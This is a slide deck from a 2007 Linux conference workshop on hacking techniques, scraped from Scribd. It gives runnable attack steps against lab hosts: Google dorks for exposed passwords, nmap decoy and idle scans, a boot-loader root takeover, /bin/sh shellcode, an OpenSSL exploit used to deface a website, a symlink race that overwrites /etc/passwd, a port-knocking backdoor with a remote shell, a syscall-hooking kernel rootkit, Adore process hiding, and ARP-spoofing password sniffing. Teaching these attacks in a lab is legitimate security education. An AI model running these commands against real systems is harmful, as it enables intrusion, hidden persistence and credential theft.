Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
279 views84 pages

Hacking Techniques

The document discusses various hacking techniques such as network hacking, web server hacking, wireless hacking, and social engineering. It also covers steps of a hacking attack like reconnaissance, scanning, gaining access, maintaining access, and covering tracks. Examples are provided of how to gather information on targets through techniques like searching online databases, exploiting website code, and using search engines.

Uploaded by

gourmetcomidas4
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
279 views84 pages

Hacking Techniques

The document discusses various hacking techniques such as network hacking, web server hacking, wireless hacking, and social engineering. It also covers steps of a hacking attack like reconnaissance, scanning, gaining access, maintaining access, and covering tracks. Examples are provided of how to gather information on targets through techniques like searching online databases, exploiting website code, and using search engines.

Uploaded by

gourmetcomidas4
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 84

Hacking Techniques

by
Michael Hamm

01./02.02.2007 linuxdays.lu 2007 1


Hacking Techniques

01./02.02.2007 linuxdays.lu 2007 2


Hacking Techniques

Attackers Objectives
Hackers Challange, Status
Spies Political Gain
Terrorists Financial Gain
Insider Damage
Prof. Crimminaly
Vandals

01./02.02.2007 linuxdays.lu 2007 3


Hacking Techniques

Geek

Hackers

Script Kiddies

Stupid Users

Automated Scripts / Viruses / Botnet / Spam

01./02.02.2007 linuxdays.lu 2007 4


Hacking Techniques

- High profile targets:

-- Banks
-- Military
-- Universities
-- Telecom / internet Provide

--Private PC’s / Enduser


-- Botnet
-- Spam
-- Homebanking Data

01./02.02.2007 linuxdays.lu 2007 5


Hacking Techniques

Most often Security problems:


(Source: CSI/FBI Computer Crime and Security Survey)
Vir

Ins

the

De

Un

WL

Ha
ial

ck
au
us

ide

ft L

NA

ing
tho
of
r

ap

Se

ris
top

rvi

ed
ce

01./02.02.2007 linuxdays.lu 2007 6


Hacking Techniques

➤ Network based System Hacking


➤ Web Server Hacking
➤ Physically enter the Target Building
➤ WLAN (Wireless LAN) Hacking
➤ War Dialling
➤ Sniffing
➤ Social Engineering
➤ Viruses

01./02.02.2007 linuxdays.lu 2007 7


Exercise:
-- physical access = root rights --

1. Interupt the bootloader by pressing >> e <<


2. Select the kernel line and press >> e <<
3. add >> init=/bin/bash << to the kernel line
4. kernel /vmlinuz-2.6.8 root=/dev/hda4 ro init=/bin/bash
5. Press >> Enter <<
6. Press >> b << to boot
7. mount –o remount,rw /dev/hda4
8. passwd hamm ( password: test123)
9. passwd (password: test123)
10.sync
11.mount –o remount,ro /dev/hda4
12.shutdown –rn now
13. Login as user hamm & launch vmware; start all VM from top down

01./02.02.2007 linuxdays.lu 2007 8


Hacking Techniques

5. Clearing Tracks 1. Reconnaissance

4. Maintaining Access 2. Scanning

3. Gaining Access

01./02.02.2007 linuxdays.lu 2007 9


Footprinting
-- Information Gathering --

➤ visit targets’ websites


➤ review HTML Code, JavaScript and Comments & robots.txt
➤ search for passwords, hidden directories, contact names

➤ Dumpster Diving
Quotation Bill Gates in: Susan Lammers; Programmers at Work
Tempus Books; Reissue Edition, 1989
„No, the best way to prepare is to write programs, and to study
great programs that other people have written. In my case, I went
to the garbage cans at the Computer Science Centre and I fished
out listings of their operating system.“

01./02.02.2007 linuxdays.lu 2007 10


Footprinting
-- Information Gathering --

➤ whois request at the Network Information Centre


-- receive information about IP address ranges
-- Names and EMail addresses of responsibles

whois -h whois.dns.lu linuxdays.lu

domainname: linuxdays.lu
nserver: arthur.tudor.lu
nserver: dorado.tudor.lu
org-name: Centre de Recherche Public Henri Tudor
adm-email: [email protected]
tec-name: Xavier Detro
tec-email: [email protected]

Important whois domains:


- RIPE (Europe & N-Africa) - APNIC (Asia Pacific)
- ARIN (N-America & S-Africa) - LACNIC (Latin America)

01./02.02.2007 linuxdays.lu 2007 11


Footprinting
-- Exercise Information Gathering --
➤ DNS Lookup
-- use nslookup tools to receive informations about DNS-
& EMAIL Server, looking for names like Oracle, TestLinux, ....
-- try a zone transfer
➤ Footprinting by DNS: nslookup(1); host(1); dig(1);
# nslookup
> server 192.168.22.22
> www.mumm.lu

> set type=mx


> mumm.lu

> set type=any


> mumm.lu

> ls –d mumm.lu # try zone transfer


> exit
# dig @192.168.22.22 mumm.lu axfr # Zonetransfer

01./02.02.2007 linuxdays.lu 2007 12


Footprinting
-- Information Gathering --

➤ whois tools:

-- Sam Spade www.samspade.org


-- Smart Whois www.tamos.com
-- Netscan www.netscantools.com
-- GTWhois www.geektools.com
-- http://www.all-nettools.com/toolbox

➤ DNS must reads:


-- RFC 1912 Common DNS Errors
-- RFC 2182 Secondary DNS Servers
-- RFC 2219 Use of DNS Aliases

01./02.02.2007 linuxdays.lu 2007 13


Footprinting
-- Information Gathering --

➤ footprinting @ google
➤ news group articles of employees @<targetdomain>
➤ search business partners link:<targetdomain>
➤ site:<targetdomain> intitle:index.of
➤ site:<targetdomain> error | warning
➤ site:<targetdomain> login | logon
➤ site:<targetdomain> username | userid
➤ site:<targetdomain> password
➤ site:<targetdomain> admin | administrator
➤ site:<targetdomain> inurl:backup | inurl:bak
➤ site:<targetdomain> intranet

01./02.02.2007 linuxdays.lu 2007 14


Google Hacking
-- Introduction --

The Beginnings:

www.theregister.co.uk/2001/11/28/the_google_attack_engine/
Link points to a Switch of a .gov Network

Google not 'hackers' best friend‘ -- ww.vnunet.com/News/1127162


Index.of +banques +filetype:xls

Johnny (I hack stuff) Long


‘Google Hacking for Penetration Testers’
Google Hacking Database http://johnny.ihackstuff.com

12.03.2006 Chicago Tribune


http://www.heise.de/newsticker/meldung/70752
2600 CIA Agents discovered via Search Engine

01./02.02.2007 linuxdays.lu 2007 15


Google Hacking
-- Introduction --

What to know:

Advanced Operands:
site:<domainname>
inurl:<path>
filetype:<xls|doc|pdf|mdb|ppt|rtf|…….>
intitle:<keyword>
intext:<keyword>

Google as an ‘Anonymous Proxy’


Google Cache
&strip=1

01./02.02.2007 linuxdays.lu 2007 16


Google Hacking
-- Introduction --

What to know:

The Power of combining Advanced Operands:


site:heise.de –site:www.heise.de
-- shows all websites NOT from the official Webserver
-- maps nre hostnames without contacting target network
-- wap.heise.de, chat.heise.de, www.tb.heise.de, …

Offline Analysis of the search result:


-- www.sensepost.com/research_misc.html
-- SOAP Google API

01./02.02.2007 linuxdays.lu 2007 17


Google Hacking
-- Introduction --

What to find:

The Google Hacking Database (johnny.ihackstuff.com):


-- Directory Listings  Hidden/Private Files
intitle:index.of ‘parent directory’
intitle:index.of.admin
intitle:index.of inurl:admin
intitle:index.of ws_ftp.log
-- Error Messages of Scripts
‘Fatal error: call to undefined function’
–reply –the –next
‘Warning: Failed opening’ include_path
-- Search for vulnerable Scripts
inurl:guestbook/guestbooklist.asp
‘Post Date’ ‘From Country’
-- Search for Backups
filetype:bak inurl:php.bak
filetype:bak inurl:php.bak
-- Search for:
--- Printers; --- Webcams; --- Intranet Sites;
--- Network Tools Ntop, MRTG; --- Databases

01./02.02.2007 linuxdays.lu 2007 18


Google Hacking
-- Exercise --

Livecycle of a Google Hack:

1. Security Problem deicovered on online product;


2. Analyse online product
3. Find typical string
4. Create a google request
5. Find vulnerable websites

Examples:
-- inurl:php.bak mysql_connect mysql_select_db
-- ext:pwd inurl:(service | authors | administrators | users)
"# -FrontPage-“
-- "index of/" "ws_ftp.ini" "parent directory“
-- !Host=*.* intext:enc_UserPassword=* ext:pcf
-- "admin account info" filetype:log
-- enable password | secret "current configuration“
-intext:the

01./02.02.2007 linuxdays.lu 2007 19


Preparation

anonymity doesn’t exist

➤ break systems in different countries / time zones


➤ install network multipurpose tools like netcat or backdoors
➤ hop from host to host to get anonymity

01./02.02.2007 linuxdays.lu 2007 20


Hacking Techniques

5. Clearing Tracks 1. Reconnaissance

4. Maintaining Access 2. Scanning

3. Gaining Access

01./02.02.2007 linuxdays.lu 2007 21


Scanning
-- Goals --

➤ mapping of the target network


➤ use system tools like traceroute & ping
➤ Visual Tools: NeoTrace (Visual Trace) & Visual Route
➤ finding the range of IP addresses
➤ discerning the subnet mask
➤ identify network devices like firewalls & routers
➤ identify servers

➤ mapping of the reachable services


➤ detecting `live` hosts on target network
➤ discovering services / listening ports / portscan; nmap;
➤ identifying operating system & services
➤ identify application behind services & patch level

01./02.02.2007 linuxdays.lu 2007 22


Scanning
-- Network Mapping --

Nmap: find living hosts

$ su –
# ns_mumm
# cat /etc/resolve.conf

# nmap –sL www.mumm.lu/27 # List Scan


(only do nslookup for the IP rage)

# nmap –-packet_trace –sP www.mumm.lu/27 # ICMP/TCP


(send ICMP Echo Request and ACK to Port 80
if RST is received  host is alive / unfiltered )

# nmap –n –P0 –sU –g 53 –p 53 –T polite www.mumm.lu/27


( UDP Scans are alomost NOT usefully; -g 53 = sourceport
-P0 = don’t PingScan first; -T polite = scan speed)

-sF, -sX, -sN, –sA, # not usable


FIN-, XMAS-, Null-, ACK- Scan # today

01./02.02.2007 linuxdays.lu 2007 23


Scanning
-- Port Scanning --

Nmap: port scan (connect scan)

# nmap –n –sT –P0 –p 80 192.168.22.21,22,24


# nmap –n –sT –P0 –p 110 192.168.22.21,22,24

SYN Port open


SYN/ACK
ACK
RST/ACK

Port closed
SYN

RST/ACK

01./02.02.2007 linuxdays.lu 2007 24


Scanning
-- Port Scanning --

Nmap: port scan (stealth scan)

# nmap –n –sS –P0 –p 80 192.168.22.21,22,24


# nmap –n –sS –P0 –p 110 192.168.22.21,22,24

SYN Port open


SYN/ACK
RST

Port closed
SYN

RST/ACK

01./02.02.2007 linuxdays.lu 2007 25


Scanning
-- Port Scanning --

Nmap: port scan

# nmap –n –sT –P0 –p 20-25,80,443 192.168.22.21,22,24

# nmap –n –sS –P0 –p 20-25,80,443 192.168.22.21,22,24

Techniques to stay anonymous:

silent scan:
# nmap –n –sT –P0 –T sneaky –p 20-25,80 192.168.22.22

fragmentation scan
# nmap –n –P0 –f –p 20-25,80 192.168.22.22

decoy scan
# nmap –n -P0 –D 1.1.1.1,2.2.2.2,ME,3.3.3.3 –p 80 <host>

01./02.02.2007 linuxdays.lu 2007 26


Scanning
-- Exercise --

Scan the MUMM.LU network:

01./02.02.2007 linuxdays.lu 2007 27


Advanced Scanning
-- IP-ID Idle Scan --

Exercise: Who the hell is scanning you?

target perform:
# tcpdump –n –i eth0 host 192.168.4.<your IP Address>

attacker perform: (idle_scan)

01./02.02.2007 linuxdays.lu 2007 28


Advanced Scanning
-- IP-ID Idle Scan --

- based on IP-ID prediction


- example with hping2 –SA –p 80 –c 5 <switch ip>
- all packets have Fragment-ID Number
- every new packet increases the IP ID Number
- by most systems IP ID + 1
- this is exploitable
- by monitoring the IP ID value of a host
- you know how many packets he sends
- this could be abused for zombie port scanning

01./02.02.2007 linuxdays.lu 2007 29


Advanced Scanning
-- IP-ID Idle Scan --

Step 1: A) send SYN/ACK to Zombie


B) investigate the answer IPID
C) repeate A) and B) multiple times, verify quality of Zombie

IP-ID Probe -> SYN/ACK


Response -> RST; IPID=2
IP-ID Probe -> SYN/ACK
Response -> RST; IPID=3

IP-ID Probe -> SYN/ACK


Zombie
Response -> RST; IPID=4

IP-ID Probe -> SYN/ACK


Response -> RST; IPID=5

01./02.02.2007 linuxdays.lu 2007 30


Advanced Scanning
-- IP-ID Idle Scan --

Step 2: A) Send SYN to target BUT spoof the Source IP Adress,


claim to be the Zombie
B) open port: Target send SYN/ACK to Zombie
C) open port: Zombie send RST and increase IPID to Target

Zombie
SYN;
Port=80; C K
N/A
SRC IP = <zombie> SY ID=6
ST; IP
R

Target

01./02.02.2007 linuxdays.lu 2007 31


Advanced Scanning
-- IP-ID Idle Scan --

Step 2: A) Send SYN to target BUT spoof the Source IP Adress,


claim to be the Zombie
B) close port: Target simply send a RST to the Zombie

Zombie
SYN;
Port=80; T
RS
SRC IP = <zombie>

Target

01./02.02.2007 linuxdays.lu 2007 32


Advanced Scanning
-- IP-ID Idle Scan --

Step 3: A) send SYN/ACK to Zombie


B) investigate the answer IPID
If IPID = 6  port was close
If IPID = 7  port was open

IP-ID Probe -> SYN/ACK


Response -> RST; IPID=7
Zombie

01./02.02.2007 linuxdays.lu 2007 33


Advanced Scanning
-- IP-ID Idle Scan --

IP ID Idle Scan with nmap

# nmap –n –P0 –p20-25,80,443 –sI <zombie> <target>


# nmap –n –P0 –p20-25,80,443 –sI 10.10.10.10 10.10.11.11

01./02.02.2007 linuxdays.lu 2007 34


Scanning
-- Identifying Services --

Banner Grabbing & Version Mapping:

- What services are bound to the port:


-- identifying service / protocoll;
-- identifying Server-Software;
-- identifying Version Number;
-- identifying additional Modules etc.

automatic approach

# nmap –n –p 20-25,80,443 –sV 192.168.22.22,25

# nmap –n –p 20-25,80,443 –oM scan1 192.168.22.22,25


# amap –B –i scan1
# amap –i scan1

01./02.02.2007 linuxdays.lu 2007 35


Scanning
-- Identifying Services --

Banner Grabbing & Version Mapping:

manual approach with Netcat

# nc 192.168.22.22 22
# nc 192.168.22.22 80
HEAD / HTTP/1.0
# nc 192.168.22.21 21
# nc 192.168.22.21 80
HEAD / HTTP/1.0

OS Detection

# nmap –O 192.168.22.22,25
# xprobe2 192.168.22.22
# xprobe2 –p tcp:443:open 192.168.22.22

01./02.02.2007 linuxdays.lu 2007 36


Hacking Techniques

5. Clearing Tracks 1. Reconnaissance

4. Maintaining Access 2. Scanning

3. Gaining Access

01./02.02.2007 linuxdays.lu 2007 37


Gaining Access
-- Where are we now --

At this point we know (without doing something illegal at all):


-- Targets business (products, partners, emplyees)
-- overview of the network topology
-- overview of live servers and open ports
-- services in use, server-software, version numbers

How to proceed:
-- is there a known vulnerability
-- do we know a vulnerability
-- known configuration problems
-- default passwords

prepare attack
-- research on internet for known security holes
-- default passwords; common misconfigurations
-- setup a test environment to practice the attack
-- ideal: fire one single attack

01./02.02.2007 linuxdays.lu 2007 38


Gaining Access
-- prepare attack --

01./02.02.2007 linuxdays.lu 2007 39


Gaining Access
-- prepare attack --

01./02.02.2007 linuxdays.lu 2007 40


Gaining Access
-- prepare attack --

01./02.02.2007 linuxdays.lu 2007 41


Gaining Access
-- prepare attack --

01./02.02.2007 linuxdays.lu 2007 42


Gaining Access
-- Buffer Overflow --

➤ Stack Based Buffer Overflows


➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows

01./02.02.2007 linuxdays.lu 2007 43


Gaining Access
-- Stack Based Buffer Overflow --

➤ C/C++ problem
➤ programming error
➤ Copy to much variable user input into fixed sized buffer

#include <stdio.h>

int main()
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}

Buffer overflow occur if you enter


`1234567890123456789012345678901234567890`

01./02.02.2007 linuxdays.lu 2007 44


Gaining Access
-- Stack Based Buffer Overflow --

Exploitation:
-- Missing bounds checking
-- Mutiple „unsafe“ functions in libc
-- Executing code in the data/stack segment
-- Creating the to be feed to the application

Memory layout of a process: high address


Stack
LIFO – top of the stack

Heap
no ‘execution’ attribute set BSS
Data
‘read-only’ attribute Code
low address

01./02.02.2007 linuxdays.lu 2007 45


Gaining Access
-- Stack Based Buffer Overflow --
- function parameters
-- Stack holding all the information for the function - local variables
-- Stack is created at the beginning of a function - data to recover previous frame
-- Stack is released at the end of a function
Stack
-- LIFO mechanism to pass arguments to
functions and to reference local variables

Frame 1
void
function (void)
{
[ ... ]
} Frame 2 EBP

int POP
main (void)
{ ESP
int a; PUSH
function (argv[1])
[ ... ] EIP: Extended Instruction Pointer
} EBP: Extended Base Pointer
ESP: Extended Stack Pointer

01./02.02.2007 linuxdays.lu 2007 46


Gaining Access
-- Stack Based Buffer Overflow --

void Stack
3 function (char *args)
{
4 char buff[512]; args
strcpy (buff, args); Return Address EIP
main ()
} SFP
Frame 1
saved registers
int local variables
1 main (int argc, char *argv[]) args
{ Return Address EIP
if (argc > 1) SFP EBP
function () saved registers
{ Frame 2
2 function (argv[1]); local variables
} else
printf ("no input\n"); buff[512]
ESP
return 0;
}
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
01./02.02.2007 linuxdays.lu 2007 47
Gaining Access
-- Stack Based Buffer Overflow --

void Stack
3 function (char *args)
{
4 char buff[512]; args
5 strcpy (buff, args);
main () Return Address
} EBP
Frame 1
saved registers
int local variables
1 main (int argc, char *argv[]) args
{ Wrong Return
if (argc > 1) SFP
function () saved registers
{ Frame 2
2 function (argv[1]);
} else buff[512]
printf ("no input\n");
return 0;
}

01./02.02.2007 linuxdays.lu 2007 48


Gaining Access
-- Stack Based Buffer Overflow --

void Stack
3 function (char *args)
{
4 char buff[512]; args
5 strcpy (buff, args);
main () Return Address
6 } EBP
Frame 1
saved registers
int local variables
1 main (int argc, char *argv[]) args
{ Wrong Return
if (argc > 1) SFP
function () saved registers
{ Frame 2
2 function (argv[1]);
} else buff[512]
printf ("no input\n");
return 0;
}

01./02.02.2007 linuxdays.lu 2007 49


Gaining Access
-- Stack Based Buffer Overflow --

void Stack
3 function (char *args)
{
4 char buff[512];
5 strcpy (buff, args);
main ()
6 }
Frame 1
int
1 main (int argc, char *argv[]) 0x0A00
{ 0x0A00
if (argc > 1) 0x0A00
function () 0x0A00
{ Frame 2
function (argv[1]); shellcode
2 shellcode 0x0C00
} else
nop 0x0A00
printf ("no input\n");
nop 0x0800
return 0;
}

01./02.02.2007 linuxdays.lu 2007 50


Gaining Access
-- Shellcode --

char linux_ia32_shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */


"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%a1 */
"\xcd\x80" /* int $0x80 */

Old school payload: bindshell, backconnect

01./02.02.2007 linuxdays.lu 2007 51


Gaining Access
-- Exercise: Web Site defacement --

$ cd /home/hamm/ssl/
$ ls –la
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
echo "hacked by me….. " > /var/www/html/index.html

- Unprivileged user -> local user privileges escalation

01./02.02.2007 linuxdays.lu 2007 52


Gaining Access
-- Exercise: Web Site defacement --

What do we see on the Firewall???

01./02.02.2007 linuxdays.lu 2007 53


Gaining Access
primary target webserver
-- why they are so vulnerable --
➤ complex application
➤ multiple subsystems:
application server, scripts, sql-server
➤ self made applications:
programmers don’t know how to write secure code
➤ Shell-Command-Injection:
bypass commands through the shell
Input: "Alice; rm - rf"
➤ SQL-Injection
bypass SQL Commands by User input
Input: "User=Alice' -&Pass=Idontknow"

01./02.02.2007 linuxdays.lu 2007 54


Hacking Techniques

5. Clearing Tracks 1. Reconnaissance

4. Maintaining Access 2. Scanning

3. Gaining Access

01./02.02.2007 linuxdays.lu 2007 55


Maintaining Access
-- be silent --

➤ after a successful initial attack


➤ hide the tracks from logfiles
➤ expand local rights; find vulnerabilities in network
➤ install rootkits, steal password database, start
network sniffer
➤ try same password on other systems
➤ find problems in topology (ex. dual homed hosts)
➤ try to attack the private network

01./02.02.2007 linuxdays.lu 2007 56


Maintaining Access
Privileges Escalation
-- Race Condition --
what could I try to attack?
- SUID / SGID binaries
find / -perm –4000 –type f –user root –print
find / -perm –2000 –type f –group root –print

- privileged process
- Kernel
- password file

Source of problems?
- configuration error
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string

01./02.02.2007 linuxdays.lu 2007 57


Maintaining Access
Privileges Escalation
-- example: race_bug --
#include <stdio.h>
#include <unistd.h>

int
main (int argc, char *argv[])
{
char path[] = "/tmp/race.txt"
FILE *fp;

fp = fopen (path, "a+");


fprintf (fp, "%s\n", argv[1]);

fclose (fp);
unlink (path);

return 0;
}

01./02.02.2007 linuxdays.lu 2007 58


Maintaining Access
Privileges Escalation
-- example: race_bug --
Prepare attack
$ cd /home/hamm/race
$ ls –la
$ ./race_bug test
$ ls –la /tmp
$ cat /etc/passwd
$ su -; cp /etc/passwd /etc/passwd.bak; exit

Attak:
$ ln –s /etc/passwd /tmp/race.txt
$ ls –la /tmp
$ cat command
$ ./command
$ ls –la /tmp
$ cat /etc/passwd
$ su – bimbam
# id

01./02.02.2007 linuxdays.lu 2007 59


Maintaining Access
Privileges Escalation
-- Exercise: privileges escalation --
$ su –
# cd /home/hamm/ssl/
# ls –la
# cp p /tftpboot
# /etc/init.d/atftpd start
# exit
$ ./openSSL 0x73 192.168.22.21 443 –c 40
/usr/bin/whoami
pwd
/usr/bin/tftp 192.168.22.1
mode binary # local root exploit
get p # kernel 2.2.x 2.4.x
quit
ls –l
chmod +x p
ls –l
./p
whoami

01./02.02.2007 linuxdays.lu 2007 60


Maintaining Access
Port Knocking
-- introduction --
Aka Port Knocking Back Door

- Open Port?????
- no promisc mode, no open ports
- raw sockets
- trigger for special packets to get activated

- attacker:
-- send trigger pkg1
-- send trigger pkg2
-- send trigger pkg3
-- send command pkg1 Port 80, 443 open; statefull

- example: Sadoor
http://cmn.listptojects.darklab.org

01./02.02.2007 linuxdays.lu 2007 61


Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 1
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
icmp {
type = 8;
}
}
}

# key 2
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
flags = SYN;
dport = 80;
sport = 3456;
}
}
}

01./02.02.2007 linuxdays.lu 2007 62


Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts
# key 3
keypkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
udp {
dport = 111;
data { bim\x20bam }
}
}
}

# command
cmdpkt
{
ip {
daddr = 192.168.22.24;
saddr = 192.168.22.1;
tcp {
sport = 80;
sport = 12345;
}
}
}

01./02.02.2007 linuxdays.lu 2007 63


Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database
and download it to /home/hamm/.sash

mksadb
mv sadoor.db /var/www/html/
chmod 644 /var/www/html/sadoor.db

Run the daemon

/usr/sbin/sadoor

Review logging

tail –f /etc/sadoor/sadoor.log

01./02.02.2007 linuxdays.lu 2007 64


Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db

2. become root
cd
cd .sash
mv /home/hamm/sadoor.db .
sadbcat sadoor.db sash.db # create encrypted db
rm –f sadoor.db # delete plain sequence

3. Sending commands
sash 192.168.22.24 \
–vv –r "cat /etc/passwd > /var/www/html/test.txt"
sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"

4. Establish a connection / remote shell


sash 192.168.22.24 –vv
sh-2.05b# whoami
sh-2.05b# /sbin/ifconfig
sh-2.05b# exit

01./02.02.2007 linuxdays.lu 2007 65


Hacking Techniques

5. Clearing Tracks 1. Reconnaissance

4. Maintaining Access 2. Scanning

3. Gaining Access

01./02.02.2007 linuxdays.lu 2007 66


Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:

- hide activities of an attacker to the legal administrator


-- active processes
-- directories & files
-- network activities

- provide a backdoor to the system

- let the attacker become root whenever he want

- collect sensitive data


-- from network
-- from user input

01./02.02.2007 linuxdays.lu 2007 67


Clearing Tracks
Rootkits
-- introduction --
1th generation: Binary Rootkits

- replace important system tools by modified versions:


-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …..

- defined parameters will become invisible in the future:


-- IP Addresses
-- directories & files
-- usernames

- easy to discover:
-- by filesystem inegrity checker: -- tripwire, -- aide

- examples: Irk3-6, (Linux), Fbrk (FreeBSD), Solaris Rootkit

01./02.02.2007 linuxdays.lu 2007 68


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits

- expand the functionality of the kernel

- can be loaded dynamically: insmod(3), rmmod(3)

- implemented as device driver


-> high level of flexibility

- implementations:
-- new modules
-- infecting existing modules

- result: trojaned kernel  full control over all userland apps.

01./02.02.2007 linuxdays.lu 2007 69


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits

- syscalls: a gate between userland and kernel

- example for syscalls: trace /bin/ls

execve(…
uname(…
brk(0)
old_mmap(…
access(…
open(…
open(…

01./02.02.2007 linuxdays.lu 2007 70


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits

- normal syscall:

parameter into
int 80
registers
Userland
Kernel
selection of the Interrupt handler: Exec syscall
interrupt handler syscall selection example: mkdir

Interrupt Descriptor Table Syscall Table


(IDT)

01./02.02.2007 linuxdays.lu 2007 71


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM (Loadable Kernel Modules) Rootkits

- manipulated syscall:

parameter into
int 80
registers
Userland
Kernel
selection of the Interrupt handler: Exec syscall
interrupt handler syscall selection Execmkdir
example: syscall
manipluated: mkdir

Interrupt Descriptor Table Syscall Table


(IDT)

01./02.02.2007 linuxdays.lu 2007 72


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit
#define MODULE /* the new mkdir syscall */
#define __KERNEL__ int hack_mkdir (const char *path) {
printk ("BimBam!\n");
#include <linux/module.h> return 0;
#include <linux/version.h> }
#include <linux/kernel.h>
#include <sys/syscall.h> int init_module (void) {
#include <stdio.h> orig_mkdir=sys_call_table[SYS_mkdir];
sys_call_table[SYS_mkdir]=hack_mkdir;
MODULE_LICENSE("GPL"); return 0;
}
/* import syscall table */
extern void *sys_call_table[]; void cleanup_module (void) {
sys_call_table[SYS_mkdir]=hack_mkdir;
/* dummy for old mkdir syscall */ }
int (*orig_mkdir) (const char *path);

01./02.02.2007 linuxdays.lu 2007 73


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Exercise: mkdir_Rootkit

cd /root/rootkit/mkdir
gcc –c –I /usr/src/linux/include mkdir.c
insmod mkdir.o
lsmod
mkdir test
ls –la
cat /var/log/messages

rmmod mkdir
lsmod
mkdir test
ls –la

01./02.02.2007 linuxdays.lu 2007 74


Clearing Tracks
Rootkits
-- introduction --
2th generation: LKM Rootkit: Adore
cd /root/rootkit/adore/
insmod adore.o
lsmod
insmod cleaner.o
lsmod
rmmod cleaner
lsmod

ps aux | grep ssh


./ava i <PID SSHD>
ps aux | grep ssh

netstat –punta | grep 22

mkdir /root/rootkit/bimbam
./ava h /root/rootkit/bimbam
ls –la /root/rootkit

./ava –U dummy

01./02.02.2007 linuxdays.lu 2007 75


Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit

- sys_call_table is not exported anymore


-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 

- all Syscalls which access the Filesystem make use of


the Virtual File System

- in Unix, most of all is handled like a file

- existing Handler-Routines are replaced by modified one


 files/folder could be hidden
 via /proc hidding of processes

01./02.02.2007 linuxdays.lu 2007 76


Clearing Tracks
Rootkits
-- introduction --
3th generation: (Virtual File System) VFS Layer Rootkit

parameter into
int 80
registers
Userland
Kernel
selection of the Interrupt handler: Syscall
interrupt handler syscall selection
VFS
ext2/ ext3/ ...

Interrupt Descriptor Table Syscall Table


(IDT)

01./02.02.2007 linuxdays.lu 2007 77


Hacking Techniques

Insider Attacks

01./02.02.2007 linuxdays.lu 2007 78


Insider Attacks
-- Password Sniffing true a Switch --
Default Gateway Attacked PC
IP: 10.10.10.1 IP: 10.10.10.2
MAC: 11:11:11:11:11:11 MAC: 22:22:22:22:22:22

ARP Reply IP 10.10.10.1 MAC 99:99:99:99:99:99

No gratuitous ARP, BUT directed ARP:


ETHERNET II
Dst: 22:22:22:22:22:22
IP: 10.10.10.99 SRC: 99:99:99:99:99:99
MAC: 99:99:99:99:99:99 ARP reply:
Sender IP addr: 10.10.10.1
Sender MAC addr: 99:99:99:99:99:99

01./02.02.2007 linuxdays.lu 2007 79


Insider Attacks
-- Password Sniffing true a Switch --
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof –i eth0 –t 192.168.4.30 192.168.4.28
3. dsniff -cn
Telnet Client: Telnet Server:
IP: 192.168.3.3 IP: 192.168.3.4

IP: ___.___.___.___ IP: ___.___.___.___

Attacker:
IP: 192.168.3.2
MAC: 00:08:74:B3:BB:F1

IP: ___.___.___.___

MAC: __:__:__:__:__:__

01./02.02.2007 linuxdays.lu 2007 80


Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3 DNS Query (HOST: server_xyz.lu)

Target: SSH Client:


IP: 192.168.3.xx

Default Gateway:
IP: 192.168.3.1

DNS Server:
IP: 158.64.4.

Attacker:
IP: 192.168.3.2

DNS Response (server_xyz.lu, 192.168.3.2)

01./02.02.2007 linuxdays.lu 2007 81


Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --

01./02.02.2007 linuxdays.lu 2007 82


Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
SSH Server:
IP: 192.168.3.3
Target: SSH Client:
IP: 192.168.3.xx

Default Gateway:
IP: 192.168.3.1

DNS Server:
IP: 158.64.4.

Attacker:
IP: 192.168.3.2

01./02.02.2007 linuxdays.lu 2007 83


Hacking for Admins

by
Michael Hamm

01./02.02.2007 linuxdays.lu 2007 84

You might also like